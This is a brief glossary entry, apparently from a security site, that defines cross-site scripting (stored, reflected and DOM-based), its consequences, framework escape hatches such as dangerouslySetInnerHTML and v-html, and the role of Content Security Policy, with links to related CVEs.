What is XSS (Cross-Site Scripting)?

An attack where attacker-controlled JavaScript executes in another user's browser in the context of your application.

Full explanation

XSS comes in three flavors: stored (malicious script saved in your DB and served to other users), reflected (script in a URL parameter echoed back), and DOM-based (client-side JS unsafely handles URL params or innerHTML). Consequences include session theft, credential harvesting, and arbitrary actions in the victim's session. Modern frameworks (React, Vue, Svelte) escape by default but `dangerouslySetInnerHTML`, `v-html`, and similar opt-outs re-introduce XSS.

Example

A user bio field stores HTML. Another user visits the profile; the browser executes whatever HTML (including `<script>`) was in the bio.

Related

Guide
XSS in React — dangerouslySetInnerHTML and the specific bugs we see
CVE
CVE-2024-47875
CVE
CVE-2024-22195
CVE
CVE-2023-44270

FAQ

Does CSP prevent XSS?

A strict CSP prevents most XSS exploitation (can still be exploited via data exfiltration or layout tricks but not full script execution). CSP is defense in depth; proper input escaping is the primary defense.